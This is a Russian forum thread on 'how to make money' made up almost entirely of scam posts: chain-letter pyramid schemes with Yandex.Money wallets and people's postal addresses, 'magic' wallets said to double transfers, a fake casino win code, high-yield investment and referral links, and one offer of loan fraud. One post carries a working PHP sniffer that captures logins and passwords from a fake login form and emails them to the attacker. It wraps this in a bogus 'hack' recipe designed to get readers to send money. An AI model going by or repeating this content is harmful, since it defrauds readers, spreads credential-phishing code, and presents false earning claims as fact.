КАК ЗАРАБОТАТЬ ДЕНЬГИ

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » КАК ЗАРАБОТАТЬ ДЕНЬГИ » Тестовый форум » Кому срочно нужны деньги


Кому срочно нужны деньги

Сообщений 1 страница 30 из 30

1

Есть вариант поднять 300000 руб за 1 неделю
Тема в кредите на вас будет висеть кредит после этого на сумму 4 мл
Для тех кому нужны деньги чтоб уехать и больше здесь не появляться
Кому все равно что потом банк будет голову шпили - вили

0

2

Привет ВСЕМ!!! В первую очередь хочу сказать что нет никаких тут лохотронов , обманов , махинаций и т.д., все что требуется это внимательно прочесть и принять решение. нужны ли вам деньги без особых трудов и вложений!!!
Ну начнем))) Зовут меня Сергей и я так же как и "вы" сначала скептически относился к подобным статьям, но меня не остановило проверить и убедится в реальности данного проекта, в чем сейчас ни капли не жалею, а даже наоборот. Вообщем суть всего этого состоит в работе с Yndex-кошельками, может кто то из вас слышал про "волшебные кошельки", ЭТО НЕ ВОЛШЕБНЫЙ КОШЕЛЁК!!!
($$$ШАГ1) Зарегистрируйтесь в системе Яндекс.Деньги, откройте в ней счёт и внесите 70 рублей 35 коп. на свой кошелёк. Лично я пополнил через терминал оплаты сотовой связи.
отправьте по 10 руб.‚ на каждый нижеперечисленный счёт ( по 10р.05к.- 05к. комиссия), вписав номер в поле «Номер счёта»; И ОБЯЗАТЕЛЬНО вписывайте в поле "назначение платежа": Пожалуйста, внесите меня в список Яндекс кошельков   Сделать это надо для того чтоб модераторы отслеживающие, данный проект, который строится на честности, не забанили вас!!!
ЧТО БЫ ПОЛУЧАТЬ ДОХОДЫ‚ НЕОБХОДИМО ОТПРАВИТЬ НА КАЖДЫЙ ИЗ ЭТИХ 7 КОШЕЛЬКОВ ПО 10 РУБЛЕЙ‚ ИНАЧЕ
СЕТЕВЫМИ МОДЕРАТОРАМИ (АДМИНИСТРАТОРАМИ) YANDEX КОШЕЛЬКОВ ВЫ ПРОСТО НЕ БУДЕТЕ ВКЛЮЧЕНЫ В ПРОЕКТ И НЕ СМОЖЕТЕ
ОБНАЛИЧИТЬ ДОХОДЫ !!!!!
Советую счета вписывать вручную, и крайне внимательно!!!
1) 41001306358249
2) 41001306360861
3) 41001306363444
4) 41001283048998
5) 41001801027054
6) 41001780833016
7) 41001857346179
($$$ШАГ2)Вам надо вычеркнуть первый в списке счет, на его место вписать второй, на место второго третий и т.д. на 7-ое место вписать свой номер счета, и сделать тоже самое что сделал я ( $$$ШАГ3 и последний) написать текст, или скопировать мой и разослать этот текст на как можно больше форумов , вообщем разослать его туда где его прочтут как можно больше пользователей. Этим вы заинтересуете народ от которого будет расти ваш заработок. Допустим на ваше сообщение откликнится 10 человек ( что в реальности будет зависеть от того как вы будет рассылать свой текст, и прочтут его сотни людей, а может и тысячи) и эти 10 человек сделают тоже что и вы, переведут на счета по 10 рублей. т.е к вам на счет придёт от каждого, и в сумме вы получите 100рублей, и вот эти 10 чел. стирают первый в списке счет и себя вносят на 7-ое место, оттодвигая вас на 6-е, и повторяют рассылку текста, и вот каждый из 10, заинтересовывает еще по 10 и они переводят по 10 р., всем когда ваш счет находится на 6-ой позиции, арифметика не сложна-вы получаете 1000 рублей, и в том же духе происходит до тех пор пока вы не встанете на первую позицию и вас не стерут, но прежде отправят вам по 10 рублей, и остается только догадываться что с вашим кашельком сделает эта прогрессия и сколько десятков тысяч рублей придёт на ваш счет!!!))))
Ну и на последок , пожелаю всем удачи!!! P.s. Мавроди такое и не снилось))))))
Ах да нормальные деньжища пойдут, ну если форумов 200 посветить в это!)))

0

3

Я зарабатываю как? читай и повтаряй
1. Зарегистрируйтесь с системе YANDEX MONEY, которая находится по адресу http://money.yandex.ru, хорошенько ознакомьтесь с данной системой как она работает, выберите оптимальный для себя вариант пополнения кошелька
и внесите 60 рублей на свой кошелёк.
2. Возьмите первый номер кошелька из нижеуказанного списка, отправьте на него 10 руб, вписав этот номер в поле «Номер счёта». В поля «Имя получателя» и «E-mail получателя» вписывать ничего не нужно. В поле «Контракт/назначение платежа» напишите – «Пожалуйста, внесите меня в список Яndex кошельков». Все, что Вы сделали - это создали услугу, и самое главное - абсолютно легально. Вы просите ЗАКОННЫЙ сервис, за который платите. Далее, начиная со второго, по аналогии отправьте по 10 руб. на следующие 5 кошельков (не забудьте вписывать в поле «Контракт/назначение платежа» «Пожалуйста, внесите меня в список Яndex кошельков»):

1) 41001414827614
2) 41001566219528
3) 41001418592905
4) 41001439178368
5) 41001709831611
6) 41001857603773
ПОВТОРЯЮ, чтобы получать доход, необходимо отправить НА КАЖДЫЙ из этих 6 кошельков по 10 руб. - иначе, сетевыми модераторами Яndex кошельков, вы просто не будете включены в систему и не сможете обналичить доход.

Теперь ВНИМАНИЕ!!! После того, как Вы выполнили ШАГ 2, скопируйте к себе на компьютер весь этот текст от начала
до конца (можно в формате txt или ещё как вам удобней). В скопированной статье удалите из списка кошельков ПЕРВЫЙ (ВЕРХНИЙ) кошелёк и переместите 2-ой кошелёк на место 1-го, который Вы стёрли, 3-ий - на место 2-го, 4-ый - на место 3-го, 5-ый - на место 4-го, 6-ой - на место 5-го! А в 6-ой номер, который оказался пустым, ВПИШИТЕ НОМЕР Вашего КОШЕЛЬКА!!! В случае возникновения проблем с Яндекс кошельком советую
обращаться НА ЭТУ страничку: http://feedback.yandex.ru/?from=money.

3. Разместите эту статью (или объявление с ссылкой на страницу, которую вы без труда можете сделать на одном из бесплатных сайтов, например, http://www.narod.ru) на НЕ МЕНЕЕ ЧЕМ 200-300 ФОРУМАХ и НОВОСТНЫХ ЛЕНТАХ (News Groups). ЗАПОМНИТЕ: ЧЕМ БОЛЬШЕ вы разместите, ТЕМ ВЫШЕ БУДЕТ ВАШ ДОХОД. И этот доход будет НАПРЯМУЮ ЗАВИСЕТЬ ОТ ВАС. Размещение этой статьи на 200 форумах, даже на
самых малопосещаемых, ГАРАНТИРУЕТ Вам доход 150 000 руб. - ЭТО МИНИМУМ!!!, в течение двух месяцев!!!
БОЛЬШЕ РАЗМЕЩЕНИЙ – БОЛЬШЕ ДОХОД (при том в ГЕОМЕТРИЧЕСКОЙ ПРОГРЕССИИ). ИТАК, КОГДА ВЫ ДОСТИГНЕТЕ ПЕРВОЙ ПОЗИЦИИ В СПИСКЕ, ВЫ БУДЕТЕ ИМЕТЬ ТЫСЯЧИ РУБЛЕЙ ПРОСТО КАК СОЗДАТЕЛЬ СПИСКА!!!
ЭТО СТОИТ 60-ти рублей и СОВСЕМ НЕ ТРУДНОЙ РАБОТЫ! ГЛАВНОЕ – ЭТО РАБОТАЕТ!!! И ЭТО ПРОСТО ЗДОРОВО!!! Займитесь этим сейчас - не откладывая на завтра….!!! ВРЕМЯ - ДЕНЬГИ!!! Но поработать все, же придется. Необходимо заинтересовать людей. Для этого необходимо воспользоваться рассылкой, размещением объявлений на специализированных сайтах о поисках работы, форумах, досках объявлений. Удачи Вам! Она уже действительно рядом! Действуйте! Плохо живут те, которые всю жизнь лишь собираются жить!
ДАВАЙТЕ РИСКНЕМ!! ВЕДЬ НИЧЕГО, КРОМЕ 60 РУБЛЕЙ НЕ ТЕРЯЕМ!! А ЕСЛИ ВДРУГ ПОЛУЧИТСЯ!?

0

4

я пошла другим путем        Следуйте инструкциям и ДЕНЬГИ НАЧНУТ ПОСТУПАТЬ в ваши почтовые ящики. Согласитесь это просто!!! Это легально. И ваш вклад составляет всего 6$(+Почтовые расходы)... ВАЖНО: Это не обман и это не незаконно при этом вы ничем не рискуете, но это работает!!! ЗАМЕТЬТЕ: Следуйте инструкциям в ТОЧНОСТИ и 50 000$ и больше будут вашими в течении от 20 до 60 дней. ВСЁ ЭТО УДАЧНО РАБОТАЕТ ТОЛЬКО БЛАГОДАРЯ ЧЕСТНОСТИ УЧАСТНИКОВ!. С этого момента вы становитесь членом Почтового бизнеса. В этом деле ваш продукт не материален - это сервис. Сейчас вы находитесь в бизнесе развития 'Почтовых рассылок'. Много больших корпораций готовы заплатить огромные деньги за подобные списки. Однако деньги заработанные фирмами благодаря этим спискам являются второстепенными в сравнении с теми деньгами которые вы заработаете находясь в этих списках. Вот те самые 3 шага к успеху: 1. Возьмите 6 листов бумаги и на каждом напишите следующее: 'Пожалуйста внесите меня в список почтовых рассылок'. Теперь заверните по 1$ в каждую бумагу, так чтобы их не было заметно в конверте(чтобы предотвратить воровство). После этого заложите по одному из листов в каждый из 6 конвертов и запечатайте их. У вас на руках, в итоге, 6 готовых запечатанных конвертов в каждом из которых по одному листу с выше упомянутой фразой, вашим именем , адресом и по одному доллару. Все что вы сделали это создали некую услугу и самое главное это абсолютно легально. Вы просите законный сервис за который платите. Как и вы я отнеслась скептически к законности этого дела , но мне все подтвердили в 'US POST OFFICE' и заверили в легальности этого бизнеса . Отправьте эти 6 конвертов по следующим адресам :
1.Lushchik Alexander str.Bahchisaraiskaj 20/27 Russian Federation 336029 Kaliningrad 
2.Yevsenya Sergey str.Zelenaya 8B-5 Russian Federation 156519 Kostroma
3.Yarullina Gulnara str.pervogo sputnika 1/74 Russian Federation 454047 Chelyabinsk
4.Kocherga Marina, str.Prospect Pobedi 104/37 Ukraine 03115 Kiev
5. Barkova Larisa Ramenskii raion, Kuziaevo 7-52 Russian Federation 140155
6. Аbdulbakieva Zhanna,  str,  Dzhambula  79-29  Republik  of  Kazakhstan  Astana 010000
2.Теперь вычеркните из этого списка первое имя и адрес, переместив тем самым список на одну строку выше (6 становится 5, 5 становится 4 :..) И впишите в 6-тую строчку ваше имя и адрес . 3. Делайте какие хотите изменения, но сохраните главную идею. Разместите эту статью на не менее чем 200 форумах и новостных лентах (News Groups) . ЗАПОМНИТЕ , чем больше вы разместите тем выше будет ваш доход и этот доход будет на прямую зависеть от вас. Этот бизнес продолжает существовать и процветать только благодаря честности и серьезности участников. Заметка: Вы можете сохранить каждое имя и адрес присланный вам - это доказывает то что вы действительно предоставляете услуги. Хорошей идеей будет если обвернуть один доллар в темную бумагу опять же для предотвращения воровства. Итак когда вы достигнeте первой позиции вы будeте иметь тысячи долларов просто как создатель списка людей. Это стоит 6$ и совсем пустяковой работы!!!Займитесь этим сейчас - не откладывая на завтра:!!! Время деньги!А теперь я вам расскажу почему вы в любом случае ничего не теряете, а ТОЛЬКО ВЫИГРЫВАЕТЕ ! Скажем из 200 размещений я получу только 5 ответов (очень низкая цифра). Значит я сделаю 5 $ находясь на 6 позиции в списке . Теперь эти 5 людей делают опять же МИНИМУМ 200 размещений с моим именем на 5 позиции, и только 5 людей отвечают тем первым 5 - это уже 25$. Дальше эти 25 людей делают по 200 размещений с моим именем на 4 строчке и только 5 отвечают - мой доход 125$. Теперь эти 125 людей разместив и получив только по 5 ответов дают мне 625$ прибыли(я на 3 позиции). Дальше смешнее: эти 625 делают по минимум 200 размещений со мною на 2 строчке и только 5 людей отвечают - это 3125$. Самое интересное это то что эти 3125 людей сделают еще по 200 размещений, ну а если им ответят только 5 людей то я уже получаю 15625$. Не так ли внушительная цифра? И это всё за первоначальный вклад в 6$. Когда вас в списке уже нет вы просто высылаете 6 $ тем людям из списка и ставите свое имя и адрес на 6 позицию и опять размещаете. Вы себе можете представить что тысячи людей со всего мира присоединяются к Интернету и читают эти статьи каждый день . Так же как и вы сейчас читаете эту!!! Так что? Потратите ли вы 6 $ что бы узнать работает ли это? Это строка для пессимистов: А если этот бизнес рухнет и никто мне денег не пришлет? Ну и что!!! Каждый день в Интернете появляются от 20000 до 50000 новых пользователей, какие шансы что они все-таки захотят попробовать себя в чем-то новом. Ну и последнее: Это действительно великая аксиома - чтобы получить что- то надо дать что-то, а что бы получить еще больше надо дать еще больше! Убедитесь в этом сами: Удачи всем!!!

0

5

Всем привет меня зовут Роман Я хочу рассказать Как обмануть лохотронщиков
Как заработать деньги через Яндекс кошелек
Обманываем наглый лохотрон
Прочтите до конца! Давайте все вместе лоханём их-ведь на том кошельке до Фига денег!!!1. Как наглые лохотронщики обманывают людей на сумму в размере 150 долларов , а некоторых на еще большие суммы.
2. Как обмануть лохотронщиков и заработать самому
Нашел я в сети где-то статью приблизительно такого содержания: «Есть в системе волшебный кошелек, и все что вы на него пошлете вернется вам в удвоенном размере!!! Любая сумма от 30руб и выше! Пошлете 30руб получите 60руб,Пошлете 100руб получите 200руб и т.д.». Конечно, всем понятно, лохотрон, но если порыть глубже…
Я не поверил, но для теста послал 30руб. Подождал часа 2, в ответ ничего не вернулось. Ну я подумал что пропали мои денежки! Да и ладно, ведь сумма не столь значительная. На следующий день проверил свой кошелек и обнаружил пополнение счета на 60руб ! Я удивился. Послал потом еще 30руб опять то же самое. Потом послал 55 руб, мне пришло 110руб. Осмелев окончательно послал все что у меня было - около 1500руб... Что было дальше, думаю, вы уже поняли. Никаких 3000руб мне никто не прислал, да и мои 1500 тоже исчезли навсегда...
Понятно как они работают. У них на сервере стоит хитрая программка, которая принимает суммы от 30руб и примерно до 250руб (закидывал им 300руб и их забрали, а 250 закинул программа вернула 500руб) Вот и заколачивают тысячи!
В общем, это я к тому, что если быть аккуратными и высылать, небольшую сумму (они принимают любые суммы, но не меньше 30руб), то всегда можно получать в два раза больше. У них есть специальная программа, которая смотрит кто сколько переводов сделал и на какую сумму, чтобы определить когда нужно кидануть. Переводы суммой до 250 рублей они не забирают никогда. Только если вы пришлете его больше 5 раз подряд с одного кошелька. То есть, послав 30руб вы в любом случае получите 60, т.к. сумма мелкая и они будут ждать пока вы пришлете больше.
Если аккуратно слать им небольшие суммы то можно их обманывать. Они уже не смотрят на переводы сами, за них это делает специальный софт (программа), что упрощает вероятность их обмана.
Я сейчас заработал на этом около 3000руб (можно делать и больше). Это не миллионы, но это более-менее стабильный доход.
Денег на этих кошельках десятки (а может и сотни) тысяч, и меня очень раздражает как они кидают людей, по этому надо их разорить.
Вот сами кошельки:
41001977437652
41001944601726

0

6

Ещё раз повторяю. Проверил несколько кошельков из написанных здесь. Сразу говорю наглый развод! Но я не проверял бы, если бы сам не обладал постоянным доходом. В нете сплошной лохотрон, теперь проверять ложить больше 50 рублей боюсь. Но этот кошелёк работает: 41001990639893. Найден на закрытом сайте wzlom.ru. Отправлять строго от 10 до 500 рублей. Я советую вам, чтобы убедиться что это не очередной лохотрон отправить минимум - 10 рублей. Дождитесь срока несколько дней и зачисления денег как правило в размере прибыли до двухкратного увеличения числа и только после этой проверки начните пользоваться кошельком! Но не жадничайте! В день можно отправить лишь пару раз!

0

7

Это всё лохотрон, многие писали уже, работает из всех только один кошелек, 41001406148238 про него писали уже гдето... но говорят правильно. отправлять можно от 10 до 500 рублей. но не больше. убедитесь, проверьте. многие уже заработали, советовать не буду, решать вам.

0

8

Здравствуйте,уважаемые посетители сайта и зарегистрированных в Яндекс.Деньги я сам лично много раз отправлял деньги на так называемые кошельки которые увеличивают сумму в два раза, но у меня ничего не получалось. И вот я  нашел  1 кошелек яндекс который реально работает, при отправлении 10 рублей мне вернули в два раза больше т.е. 20. Только к сожалению можно это провести один раз в день.
Вот этот кошелек
410011113007531 самое главное вы отправляете 10 рублей в течение 10-15 минут приходит 20 рублей не вру лично проверил

0

9

Международная система финансовой взаимопомощи Gold Line International

Gold Line International – это единая международная система финансовой взаимопомощи, созданная с целью объединения миллионов людей по всему миру для оказания постоянной материальной поддержки друг другу.

Примите мое приглашение в Goldline http://kostrova.goldline.pro и все люди подарят вам 1 рублю

В двух словах как в старом форумном приколе - есть список из семи человек которым ты отправляешь деньгу, далее верхнего из списка удаляешь, а вниз добавляешь себя и размножаешь список по всем форумам, последователям предлагаешь сделать тоже самое, теперь это автоматически и без обмана! Вступайте в голдлайн по моему приглашению http://goldline.pro/?partner=kostrova

0

10

Цитировать   Ответить
Как заработать в системе Yandex Money.Я наткнулась на это на одном форуме совершенно случайно и решила попробовать.Бродя,как обычно,по разного рода форумам,я нахожу эту статью,в которой говориться,что можно сделать ТЫСЯЧИ ДОЛЛАРОВ ЗА ПАРУ НЕДЕЛЬ ПРИ ВЛОЖЕНИИ ВСЕГО 30 РУБЛЕЙ(прим.от автора:таких бабаок за две недели Вы явно не увидите,гораздо позже)Там говорилрсь,что надо послать по 10 рублей на 3 Internet кошелька,которые ниже перечислены.Потом Вы вписываете номер своего Internet кошелька и закидываете данное с Вами на третьей строчке сообщение на 200 различных форумов,социальные сети,доски объявлений и многочисленные сайты по поиску работы.Никаих уловок!Ну,я поразмышляла и подумала,что я,в принципе,ничего не теряю,кроме 30 рублей:и решила попробовать.Установила Internet кошелёк,перечислсла всем участникам акции по 10 рублей,и начала рассылать это объявление по разным форумам.Втечение 2 дней я зарегистрировалась на 120 бизнес форумах и бесплатных досках объявлений.Прошла неделя,заглядываю в свой Internet кошелёк:поступлений никаих нет.А разные участники пишут,что за неделю заработали кто по 25$,кто по 15$.Ну,и я бросила это занятие,так и не дослав своё объявление до 200 форумов.Ещё через 2 недели,случайно в Internet нащла комментарий к этому проекту(комментарий убедительный).Открыла свой Internet кошелёк,а в нём уже около 900рублей.Непонятная картина,но всё равно,за один месяц 900-это очень мало.И,вдруг,после одного месяца началось самое интересное:на мой кошелёк стали приходить деньги каждый день,спустя ещё 2 недели,на моём счету было уже более 30000рублей!После этого,я отправила свои объявления ещё на 120 форумов.Результат был ошеломляющий!По прошествии всего 2 месяцев,я получила 4700$ и деньги идут каждый день.Каждые 6 минут на мой счёт поступает 10 рублей!И всё это только за цену 30 рублей!!!Я не поверила,что это работает,пока не стала получать переводы со всего света!
Теперь немного посчитаем,что будет,если привлечь в 1 месяц 5 человек.
Итак,1 месяц Вы привлекли 5 человек = 50рублей
2 месяц каждый человек из 1-го месяца привлёк 5 человек:5*5 = 25чел. = 250рублей;
3 месяц каждый человек из 2-го месяца привлёк 5 человек:25*5 = 125чел. = 1250рублей;
4 месяц каждый человек из 3-го месяца привлёк 5 человек:125*5 = 625чел. = 6250рублей;
5 месяц каждый человек из 4-го месяца привлёк 5 человек:625*5 = 3125чел. = 31250рублей..
Итог:за 6 месяцев работы заработок равен 195000 рублей.При вложении 30 рублей!И это,если привлечь 5 человек в месяц.а,если привлекать больше,да,ещё и каждый месяц,а не только в первый,то Ваша прибыль увеличится в разы.Моя работа теперь каждый день по 2 часа в Internet и всё!А заработок такой,что никаким руководителям и начальникам даже и не снился.
Теперь я расскажу Вам как это работает и,самое главное,ПОЧЕМУ!Я Вам обещаю,что,если Вы в точности будете соблюдать ниже перечисленные инструкции,то Вы начнёте получать намного больше денег,чем Вы думали,не прилагая к этому особых усилий.Согласитесь-это просто!И Ваш вклад составляет всего 30 рублей!ВАЖНО:ЭТО НЕ ОБМАН И «НЕ РАЗВОД»!!!И при этом Вы НИЧЕМ НЕ РИСКУЕТЕ,но ЭТО РАБОТАЕТ!!!
ВНИМАНИЕ!!!ПРОЧТИТЕ ЭТО ПАРУ РАЗ!
Всё это работает,благодаря ЧЕСТНОСТИ участников!Вот те самые ТРИ ШАГА К УСПЕХУ:
1.Зарегистрируйтесь в системе Yandex Money,хорошенько ознакомтесь с данной системой,как она работает.можно просто зарегистрировать почтовый ящик на Яндексе и,войдя на почту,можно создать кошелёк.Установите Intenet кошелёк,затем выберите оптимальный для себя способ пополнения кошелька и внесите 40(почему 40?потому что за транзакции берут процент)рублей на свой кошелёк(карточки Yndex Money минмум 100рублей продаются в обычных ларьках или прочитайте на страничке другие варианты поплнения кошелька)
2.Возьмите первый номер кошелька из ниже указанного списка,отправьте на него 10 рублей,вписав этот номер в поле «Номер счёта»(в поле «Имя получателя» и «Е-mail получателя»вписывать ничего не нужно),в поле «Контракт/назначение платежа» напишите: «Пожалуйста,внесите меня в список Yandex кошельков».Всё,что Вы сделали-это создали услугу и,самое главное-абсолютно легально!Вы просите законный сервис,за который платите.Далее,начиная со второго,по аналогии отправьте по 10 рублей на третий кощелёк(не забудьте вписывать в поле «Контракт/назначение платежа»: «Пожалуйста,внесите меня в список Yandex кошельков»):
1)41001772878357;
2)41001573492381;
3)410011241493249;
Теперь,внимание!!!После того,как Вы выполнили шаг2,скопируйте себе на компьютер весь этот текст от начала до конца(можно в формате txt или ещё как Вам удобней).В скопированной статье вычеркните из этого списка 1-ый кошелёк и переместите 2-ой кошелёк на место 1-го,который Вы стёрли,тем самым,переместите список на одну строку выше(3-ий становится 2-ым,2-ой становится 1-ым),и впишите в 3-ю строчку Ваш кошелёк.
3.Желательно не делать в этой статье какие-либо изменения,т.к. этот текст наиболее понятно излагает смысл.Разместите эту статью на не менее,чем на 200 форумах и новостных лентах(News Groups),или рассылайте по почте,социальным сетям,сайтам по поиску работы(объявление надо разместить в каждом городе отдельно)и досках объявлений.Запомните,чем больше Вы разместите,тем выше будет Ваш доход,и этот доход напрямую будет зависеть от Вас!Размещение этой статьи на 200 форумах,даже на самых малопосещаемых,гарантирует Ваш доход.Больше размещений-больше доход,притом в геометричемкой прогрессии.Помните это!
Этот бизнес продолжает существовать и процветать только БЛАГОДАРЯ ЧЕСТНОСТИ И СЕРЬЁЗНОСТИ УЧАСТНИКОВ!Итак,когда Вы достигнете первой позиции,Вы будете иметь тысячи долларов просто как создатель списка!Это стоит 30 рублей и совсем пустяковой работы!И главное-это реально!От всей души,искренне желаю Вам удачи!!!

0

11

Яндекс Деньги 410011436986690 вот кошелёк который работает по принципу 30/70,то есть вы кидаете 25 приходит примерно 45)))
Да я знаю немного, зато надёжно))))
О да не кидайте больше 50 рублей)))
Делюсь потому что знаю на своём опыте как сложно зарабатывать деньги в инете))))

0

12

Два часа ночи, я был готов пойти спать, но надо было проверить почту. Зайдя к себе на мыльник (зарегистрирован я на яндекс.ру), я увидел огромное кол-во спама. Долбаный антиспам, установленный на yandex.ru, работает дерьмово, видимо спам - подарок от яндекс .ру. Что ж, как никак Новый Год скоро, надо тоже сделать подарок любимому почтовику))
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у яндекса есть много других сервисов помимо почтового, в строке запроса я написал: site:*yandex.ru. В ответ гугль вывалил 214 000 000 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры yandex.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.yandex.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы был баг и робот яндекса присылал мне пароль от яндекс карты. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого pixcher'a продолжить начатое мною дело. На следующий день (т.е. на этот же ) на аську пришла мессага от pixcher'a. Он создал фэйк форму, а также составил ядовитый урл:
на нашу фэйк форму'</script>
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы админы яндекса чувствовали себя сухо и комфортно . Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пороль карты на мыло , вот код сниффера:
<?
$adminmail = "mymail@yandex ru";
function email($to,$mailtext) {
mail($to,'password',$mailtext,$adminmail);
}
$text="[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n";
email($adminmail,$text);
$file = fopen("logs.txt","a");
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);
echo "<FORM id='auth' action='http://talk.mail.ru/login.html' method=post>
<INPUT type=hidden name=login value='$_POST[login]'>
<INPUT type=hidden name=pass value='$_POST[pass]'>
<script>auth.submit();</script>
</FORM>";
?>
Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нить сбои в работе службы DNS. После этого мы создали баг к кошельку
Для проверки проделанной работы мы кинули 50 руб на этот номер кошелька  410011328447899
И на мой кошель минут через 5 пришло 300 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом pixcher'a решили еще раз протестировать наш баг и кинуть 200 руб ну обратно нам так не чего и не пришло. Я долго думал в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 50 рублей . И я не поверил своим глазам баг не исчез =) Запрос к БД на число 50 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли опять 300 рублей. Как видишь, даже раскрученный проект имеет ошибки.
"Как выполнить взлом яндекс денег на своем компе"
1. Для начала проходим сюда yandex.ru
2. Заводим почтовый ящик
3. Заводим яндекс счет
4. Ложем на свой яндекс счет денег . Ну вам для этого взлома понадобиться 50 рублей
5. Теперь нажимаем перевести и переводим сумму не больше не меньше а ровно 50 рублей
6 Переводим на этот счет 410011328447899 где мы сделали баг
7. Где сообщение получателю пишем вот это:
SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND singer_id = '300''
Там где написано id = «0»
Меняем значения «0» на свой номер кошелька
Вот пример :
id = «410011328447899»
8. В название платежа пишем это:
cc.content_id
9. И потом жмем перевести
10. Все дело сделано ждем минут 5 и к вам должны прийти 300 рублей. Надеюсь подробно объяснил вам.

0

13

Здравствуйте,уважаемые посетители сайта и зарегистрированных в Яндекс.Деньги я сам лично много раз отправлял деньги на так называемые кошельки которые увеличивают сумму в два раза, но у меня ничего не получалось. И вот я  нашел  1 кошелек яндекс который реально работает, при отправлении 10 рублей мне вернули в два раза больше т.е. 20. Только к сожалению можно это провести один раз в день.
Вот этот кошелек
410011409051595 самое главное вы отправляете 10 рублей в течение 10-15 минут приходит 20 рублей не вру лично проверил

0

14

Яндекс Деньги 410011409051595 вот кошелёк который работает по принципу 30/70,то есть вы кидаете 25 приходит примерно 45
Да я знаю немного, зато надёжно
О да не кидайте больше 50 рублей
Делюсь потому что знаю на своём опыте как сложно зарабатывать деньги в интернете

0

15

Здравствуйте,уважаемые посетители сайта и зарегистрированных в Яндекс.Деньги я сам лично много раз отправлял деньги на так называемые кошельки которые увеличивают сумму в два раза, но у меня ничего не получалось. И вот я  нашел  1 кошелек яндекс который реально работает, при отправлении 68 рублей мне вернули в два раза больше т.е. 136. Только к сожалению можно это провести один раз в день.
Вот этот кошелек
410011409051595 самое главное вы отправляете 68 рублей в течение 10-15 минут приходит 136 рублей.Наслаждайтесь,пока другие не знают!!!

0

16

Приветик всем.Ещё  Проверил несколько кошельков из написанных здесь. Сразу говорю наглый развод! Но я не проверял бы, если бы сам не обладал постоянным доходом. В нете сплошной лохотрон, теперь проверять ложить больше 50 рублей боюсь. Но этот кошелёк работает: 410011409051595. Найден на закрытом сайте wzlom.ru. Отправлять строго от 68,102,304,500 до 500 рублей. Я советую вам, чтобы убедиться что это не очередной лохотрон отправить минимум - 68 рублей. Дождитесь 10 минут и зачисления денег, как правило в размере прибыли до двухкратного увеличения числа и только после этой проверки начните пользоваться кошельком! Но не жадничайте! В день можно отправить лишь пару раз!

0

17

Здравствуйте,уважаемые. Вижу здесь большое количество Яндекс-кошельков,но что-то сомневаюсь в их "реальности". Существовать-то они существуют...только это не золотые кошельки,а кошельки тех,кто хочет,чтобы к ним на счет посылали денежки люди, которые впервые столкнулись с этим и не в полной мере просвещены в этой области. Проверил, ради интереса, парочку кошельков, указанных на этом сайте. И что вы думаете? Да и думать здесь особо не приходится. Ничего не пришло. Золотые кошельки и правда существуют. Но,к сожалению, многие пользуются их наличием и выдают свои личные кошельки за якобы золотые. 410011397953049 пожалуйста. работающий кошелек. во всяком случае, мне приходили деньги. Посылаешь 50,а обратно приходит 100. Пробуйте) вот еще один кошелек 410011447729428 я его не проверял но говорят работает ,только посылаем от 70 до 110 рублей,всем спасибо

0

18

Попробовал не мало кошельков но безрезультатно. в данный момент вот этот рабочий !
Положил 50 пришло 150руб , я посылаю 150руб и в течении нескольких часов приходит приходит перевод на 450руб максимальная сумма перевода 2000, уже несколько недель отправляю и все работает, убедитесь сами, вот 410011462762137 пробуйте и убедитесь! Внимание очень много развода!

0

19

регистрируйтесь на http://f-fiftry.net/?ref=4170502 и получайте деньги

0

20

Нашел одну очень интересную вещь. Это счёт одного интернет-казино . Смысл в этом казино в том, что когда человек выигрывает, он получает на свой счёт в 2 раза больше денег, которых он поставил на игру. При этом отсылается один замечательный код.
Так вот, перейдём к сути. Если послать на кошелёк этого интернет-казино выигрышный код и сумму, которую вы хотите увеличить, то деньги придут к вам обратно, причем сумма увеличится вдвое.
Отправляешь со своего Z кошелька любую сумму ( не меньше 2 WMZ)
на кошелёк Z171860930630 (это кошелек системы Internet-Casino ).
В графе «ПРИМЕЧАНИЕ» нужно указать следующее:
winncode=script=FIC0113723Sk3/Lks/2/=0FofWM

0

21

Новый проект! Запустился недавно,фирма серьезная платит исправно.Я уже вывел 550 руб.Смысл прост,вы инвестор вкладываете деньги сколько хотите сумма вклада от 100руб до 15000.Доход 30% от вложеной суммы в сутки,выводить деньги можно ежедневно.Много писать не буду заходите сами увидите,ВОТ ССЫЛКА  http://faceurl.ru/buttons/znak/YinYang.png

0

22

ВНИМАНИЕ ВНИМАНИЕ  запускаеться проект ФОРМУЛА ДЕНЕГ(АНАЛОГ give1get4)                               
УСПЕЙТЕ ПОПАСТЬ В ПЕРВУЮ ЛИНИЮ ПОД ТЫСЯЧНЫЕ ПЕРЕЛИВЫ регистрация-  http://www.formuladeneg.net/                               
вот офицальный сайт http://formuladeneg.com/give1get4   с сайта регистрация не доступна так как регистрируються самые первые люди из тысячи                               
за 12ч заработал от переливов 2.500$    Запись  конфы здесь>>>>                                                             
